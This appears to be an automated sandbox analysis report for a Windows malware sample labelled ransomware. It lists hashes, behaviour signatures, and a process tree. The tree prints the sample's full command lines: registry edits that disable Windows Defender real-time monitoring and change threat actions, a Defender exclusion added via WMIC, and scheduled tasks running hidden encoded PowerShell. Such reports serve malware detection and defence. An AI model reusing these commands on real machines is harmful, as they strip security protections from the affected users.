caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59

Analysis

max time kernel
92s
max time network
94s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-05-2024 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Size

6.6MB
MD5

63f5795f3090d05b9165f4788e8cd0be
SHA1

e471234ef41fc7c15ee1213fb3b04f0b4bff05ba
SHA256

caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59
SHA512

f17d886adf196a79b7226d387e50497c6fd0cf0933bb885d7e2fd5bb448d131da95eb7724484aebfcb3a70cde0d2c68b7ead007a7f743d8cb3528856bda4b99a
SSDEEP

196608:lNZIJez06oDGWsY2C7KelsLeElAFnWVlo4439VQeWx:lN6e6uPCVlsLfqFnF4IQn

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HCtEkPSKU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lOSXAGLcobUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GiPqhqLluuCEC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aSRIytoBnSqU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hduqDfvYrAfrHLVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE

pid process

1888 powershell.exe
1628 powershell.EXE
1684 powershell.EXE
2828 powershell.exe
1196 powershell.EXE
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\manifest.json	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.exe2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Program Files (x86)\aSRIytoBnSqU2\bTPwoUwOwygKu.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\lOSXAGLcobUn\nFVXxco.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\GiPqhqLluuCEC\ewzBFbS.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\znWnvKO.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\kuRaZQzPzSEXqOG.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2396 2780 WerFault.exe 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Windows\Tasks\kuRaZQzPzSEXqOG.job	schtasks.exe

pid	pid_target	process	target process
2396	2780	WerFault.exe	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1856	schtasks.exe
632	schtasks.exe
3000	schtasks.exe
2784	schtasks.exe
320	schtasks.exe
2232	schtasks.exe
2812	schtasks.exe
2120	schtasks.exe
2068	schtasks.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

pid	process
1888	powershell.exe
1888	powershell.exe
1888	powershell.exe
1628	powershell.EXE
1628	powershell.EXE
1628	powershell.EXE
1684	powershell.EXE
1684	powershell.EXE
1684	powershell.EXE
2828	powershell.exe
1196	powershell.EXE
1196	powershell.EXE
1196	powershell.EXE
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	1628	powershell.EXE
Token: SeDebugPrivilege	1684	powershell.EXE
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeIncreaseQuotaPrivilege	1852	WMIC.exe
Token: SeSecurityPrivilege	1852	WMIC.exe
Token: SeTakeOwnershipPrivilege	1852	WMIC.exe
Token: SeLoadDriverPrivilege	1852	WMIC.exe
Token: SeSystemProfilePrivilege	1852	WMIC.exe
Token: SeSystemtimePrivilege	1852	WMIC.exe
Token: SeProfSingleProcessPrivilege	1852	WMIC.exe
Token: SeIncBasePriorityPrivilege	1852	WMIC.exe
Token: SeCreatePagefilePrivilege	1852	WMIC.exe
Token: SeBackupPrivilege	1852	WMIC.exe
Token: SeRestorePrivilege	1852	WMIC.exe
Token: SeShutdownPrivilege	1852	WMIC.exe
Token: SeDebugPrivilege	1852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1852	WMIC.exe
Token: SeRemoteShutdownPrivilege	1852	WMIC.exe
Token: SeUndockPrivilege	1852	WMIC.exe
Token: SeManageVolumePrivilege	1852	WMIC.exe
Token: 33	1852	WMIC.exe
Token: 34	1852	WMIC.exe
Token: 35	1852	WMIC.exe
Token: SeDebugPrivilege	1196	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 2780 wrote to memory of 2424	2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 2780 wrote to memory of 2424	2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 2780 wrote to memory of 2424	2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 2780 wrote to memory of 2424	2780	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 2424 wrote to memory of 2440	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2440	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2440	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2440	2424	cmd.exe	forfiles.exe
PID 2440 wrote to memory of 2444	2440	forfiles.exe	cmd.exe
PID 2440 wrote to memory of 2444	2440	forfiles.exe	cmd.exe
PID 2440 wrote to memory of 2444	2440	forfiles.exe	cmd.exe
PID 2440 wrote to memory of 2444	2440	forfiles.exe	cmd.exe
PID 2444 wrote to memory of 2480	2444	cmd.exe	reg.exe
PID 2444 wrote to memory of 2480	2444	cmd.exe	reg.exe
PID 2444 wrote to memory of 2480	2444	cmd.exe	reg.exe
PID 2444 wrote to memory of 2480	2444	cmd.exe	reg.exe
PID 2424 wrote to memory of 2484	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2484	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2484	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2484	2424	cmd.exe	forfiles.exe
PID 2484 wrote to memory of 2540	2484	forfiles.exe	cmd.exe
PID 2484 wrote to memory of 2540	2484	forfiles.exe	cmd.exe
PID 2484 wrote to memory of 2540	2484	forfiles.exe	cmd.exe
PID 2484 wrote to memory of 2540	2484	forfiles.exe	cmd.exe
PID 2540 wrote to memory of 2544	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2544	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2544	2540	cmd.exe	reg.exe
PID 2540 wrote to memory of 2544	2540	cmd.exe	reg.exe
PID 2424 wrote to memory of 2556	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2556	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2556	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2556	2424	cmd.exe	forfiles.exe
PID 2556 wrote to memory of 2496	2556	forfiles.exe	cmd.exe
PID 2556 wrote to memory of 2496	2556	forfiles.exe	cmd.exe
PID 2556 wrote to memory of 2496	2556	forfiles.exe	cmd.exe
PID 2556 wrote to memory of 2496	2556	forfiles.exe	cmd.exe
PID 2496 wrote to memory of 2608	2496	cmd.exe	reg.exe
PID 2496 wrote to memory of 2608	2496	cmd.exe	reg.exe
PID 2496 wrote to memory of 2608	2496	cmd.exe	reg.exe
PID 2496 wrote to memory of 2608	2496	cmd.exe	reg.exe
PID 2424 wrote to memory of 2592	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2592	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2592	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2592	2424	cmd.exe	forfiles.exe
PID 2592 wrote to memory of 2604	2592	forfiles.exe	cmd.exe
PID 2592 wrote to memory of 2604	2592	forfiles.exe	cmd.exe
PID 2592 wrote to memory of 2604	2592	forfiles.exe	cmd.exe
PID 2592 wrote to memory of 2604	2592	forfiles.exe	cmd.exe
PID 2604 wrote to memory of 2560	2604	cmd.exe	reg.exe
PID 2604 wrote to memory of 2560	2604	cmd.exe	reg.exe
PID 2604 wrote to memory of 2560	2604	cmd.exe	reg.exe
PID 2604 wrote to memory of 2560	2604	cmd.exe	reg.exe
PID 2424 wrote to memory of 2432	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2432	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2432	2424	cmd.exe	forfiles.exe
PID 2424 wrote to memory of 2432	2424	cmd.exe	forfiles.exe
PID 2432 wrote to memory of 2528	2432	forfiles.exe	cmd.exe
PID 2432 wrote to memory of 2528	2432	forfiles.exe	cmd.exe
PID 2432 wrote to memory of 2528	2432	forfiles.exe	cmd.exe
PID 2432 wrote to memory of 2528	2432	forfiles.exe	cmd.exe
PID 2528 wrote to memory of 1888	2528	cmd.exe	powershell.exe
PID 2528 wrote to memory of 1888	2528	cmd.exe	powershell.exe
PID 2528 wrote to memory of 1888	2528	cmd.exe	powershell.exe
PID 2528 wrote to memory of 1888	2528	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe"
1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2444

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2480

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2540

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:2544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2496

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2608

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2604

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:2560

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:2332

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggiEulQJn" /SC once /ST 03:17:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1856

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggiEulQJn"
2⤵
PID:1616

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggiEulQJn"
2⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
2⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
2⤵
PID:1544

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2128

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gGIDJBcfD" /SC once /ST 02:47:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:632

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gGIDJBcfD"
2⤵
PID:1420

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gGIDJBcfD"
2⤵
PID:3036

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
2⤵
PID:452

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
3⤵
PID:1444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
